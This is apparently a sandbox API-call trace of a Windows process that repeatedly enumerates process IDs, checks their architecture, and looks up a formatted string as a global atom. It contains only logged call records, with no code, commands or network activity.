	[0100.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3d0
	[0100.604] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.604] CloseHandle (hObject=0x3d0) returned 1
	[0100.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3d0
	[0100.605] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.605] CloseHandle (hObject=0x3d0) returned 1
	[0100.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3d0
	[0100.605] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.605] CloseHandle (hObject=0x3d0) returned 1
	[0100.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3d0
	[0100.605] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.605] CloseHandle (hObject=0x3d0) returned 1
	[0100.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3d0
	[0100.606] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.606] CloseHandle (hObject=0x3d0) returned 1
	[0100.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3d0
	[0100.606] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.606] CloseHandle (hObject=0x3d0) returned 1
	[0100.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3d0
	[0100.606] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.606] CloseHandle (hObject=0x3d0) returned 1
	[0100.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3d0
	[0100.606] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.606] CloseHandle (hObject=0x3d0) returned 1
	[0100.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3d0
	[0100.606] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.607] CloseHandle (hObject=0x3d0) returned 1
	[0100.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3d0
	[0100.607] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.607] CloseHandle (hObject=0x3d0) returned 1
	[0100.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3d0
	[0100.607] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.607] CloseHandle (hObject=0x3d0) returned 1
	[0100.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3d0
	[0100.607] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.607] CloseHandle (hObject=0x3d0) returned 1
	[0100.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3d0
	[0100.607] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.607] CloseHandle (hObject=0x3d0) returned 1
	[0100.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3d0
	[0100.608] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.608] CloseHandle (hObject=0x3d0) returned 1
	[0100.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3d0
	[0100.608] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.608] CloseHandle (hObject=0x3d0) returned 1
	[0100.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3d0
	[0100.608] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.608] CloseHandle (hObject=0x3d0) returned 1
	[0100.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3d0
	[0100.608] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.608] CloseHandle (hObject=0x3d0) returned 1
	[0100.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3d0
	[0100.608] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.608] CloseHandle (hObject=0x3d0) returned 1
	[0100.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3d0
	[0100.609] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.609] CloseHandle (hObject=0x3d0) returned 1
	[0100.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3d0
	[0100.609] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.609] CloseHandle (hObject=0x3d0) returned 1
	[0100.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3d0
	[0100.609] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.609] CloseHandle (hObject=0x3d0) returned 1
	[0100.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3d0
	[0100.609] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.609] CloseHandle (hObject=0x3d0) returned 1
	[0100.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3d0
	[0100.609] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.609] CloseHandle (hObject=0x3d0) returned 1
	[0100.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3d0
	[0100.610] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.610] CloseHandle (hObject=0x3d0) returned 1
	[0100.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3d0
	[0100.610] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.610] CloseHandle (hObject=0x3d0) returned 1
	[0100.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3d0
	[0100.610] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.610] CloseHandle (hObject=0x3d0) returned 1
	[0100.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3d0
	[0100.610] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.610] CloseHandle (hObject=0x3d0) returned 1
	[0100.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3d0
	[0100.610] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.610] CloseHandle (hObject=0x3d0) returned 1
	[0100.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3d0
	[0100.611] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.611] CloseHandle (hObject=0x3d0) returned 1
	[0100.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3d0
	[0100.611] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.611] CloseHandle (hObject=0x3d0) returned 1
	[0100.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3d0
	[0100.611] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.611] CloseHandle (hObject=0x3d0) returned 1
	[0100.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3d0
	[0100.612] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.612] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.612] GetProcessTimes (in: hProcess=0x3d0, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.612] wsprintfA (in: param_1=0x66d7c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.613] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.613] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.613] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.613] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.613] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.613] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.613] CloseHandle (hObject=0x3d0) returned 1
	[0100.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x3d0
	[0100.613] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.614] CloseHandle (hObject=0x3d0) returned 1
	[0100.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x3d0
	[0100.614] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.614] CloseHandle (hObject=0x3d0) returned 1
	[0100.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x424
	[0100.677] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.677] CloseHandle (hObject=0x424) returned 1
	[0100.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x424
	[0100.678] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.678] CloseHandle (hObject=0x424) returned 1
	[0100.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x424
	[0100.678] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.678] CloseHandle (hObject=0x424) returned 1
	[0100.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x424
	[0100.678] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.679] CloseHandle (hObject=0x424) returned 1
	[0100.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x424
	[0100.679] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.679] CloseHandle (hObject=0x424) returned 1
	[0100.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x424
	[0100.679] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.679] CloseHandle (hObject=0x424) returned 1
	[0100.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x424
	[0100.679] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.679] CloseHandle (hObject=0x424) returned 1
	[0100.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x424
	[0100.679] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.679] CloseHandle (hObject=0x424) returned 1
	[0100.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0100.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x424
	[0100.680] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.680] CloseHandle (hObject=0x424) returned 1
	[0100.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x424
	[0100.680] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.680] CloseHandle (hObject=0x424) returned 1
	[0100.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x424
	[0100.680] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.680] CloseHandle (hObject=0x424) returned 1
	[0100.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x424
	[0100.680] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.680] CloseHandle (hObject=0x424) returned 1
	[0100.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x424
	[0100.680] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.680] CloseHandle (hObject=0x424) returned 1
	[0100.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x424
	[0100.681] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.681] CloseHandle (hObject=0x424) returned 1
	[0100.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x424
	[0100.681] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.681] CloseHandle (hObject=0x424) returned 1
	[0100.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x424
	[0100.681] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.681] CloseHandle (hObject=0x424) returned 1
	[0100.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x424
	[0100.682] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.682] CloseHandle (hObject=0x424) returned 1
	[0100.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x424
	[0100.682] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.682] CloseHandle (hObject=0x424) returned 1
	[0100.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x424
	[0100.682] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.682] CloseHandle (hObject=0x424) returned 1
	[0100.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x424
	[0100.682] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.682] CloseHandle (hObject=0x424) returned 1
	[0100.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x424
	[0100.682] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.682] CloseHandle (hObject=0x424) returned 1
	[0100.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x424
	[0100.683] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.683] CloseHandle (hObject=0x424) returned 1
	[0100.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x424
	[0100.683] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.683] CloseHandle (hObject=0x424) returned 1
	[0100.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x424
	[0100.683] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.683] CloseHandle (hObject=0x424) returned 1
	[0100.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x424
	[0100.683] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.683] CloseHandle (hObject=0x424) returned 1
	[0100.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x424
	[0100.683] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.683] CloseHandle (hObject=0x424) returned 1
	[0100.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x424
	[0100.684] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.684] CloseHandle (hObject=0x424) returned 1
	[0100.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x424
	[0100.684] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.684] CloseHandle (hObject=0x424) returned 1
	[0100.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x424
	[0100.684] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.684] CloseHandle (hObject=0x424) returned 1
	[0100.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x424
	[0100.684] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.684] CloseHandle (hObject=0x424) returned 1
	[0100.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x424
	[0100.685] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.685] CloseHandle (hObject=0x424) returned 1
	[0100.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x424
	[0100.685] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.685] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.685] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.686] wsprintfA (in: param_1=0x6951c0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.686] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.686] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.686] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.686] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.686] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.686] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.687] CloseHandle (hObject=0x424) returned 1
	[0100.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x424
	[0100.687] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.687] CloseHandle (hObject=0x424) returned 1
	[0100.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x424
	[0100.687] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.687] CloseHandle (hObject=0x424) returned 1
	[0100.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0100.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0100.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0100.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0100.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0100.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0100.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0100.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0100.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0100.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0100.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0100.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0100.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0100.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0100.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0100.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0100.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0100.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0100.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3fc
	[0100.754] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.754] CloseHandle (hObject=0x3fc) returned 1
	[0100.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0100.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0100.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3fc
	[0100.754] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.754] CloseHandle (hObject=0x3fc) returned 1
	[0100.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0100.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3fc
	[0100.755] IsWow64Process (in: hProcess=0x3fc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.755] CloseHandle (hObject=0x3fc) returned 1
	[0100.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3fc
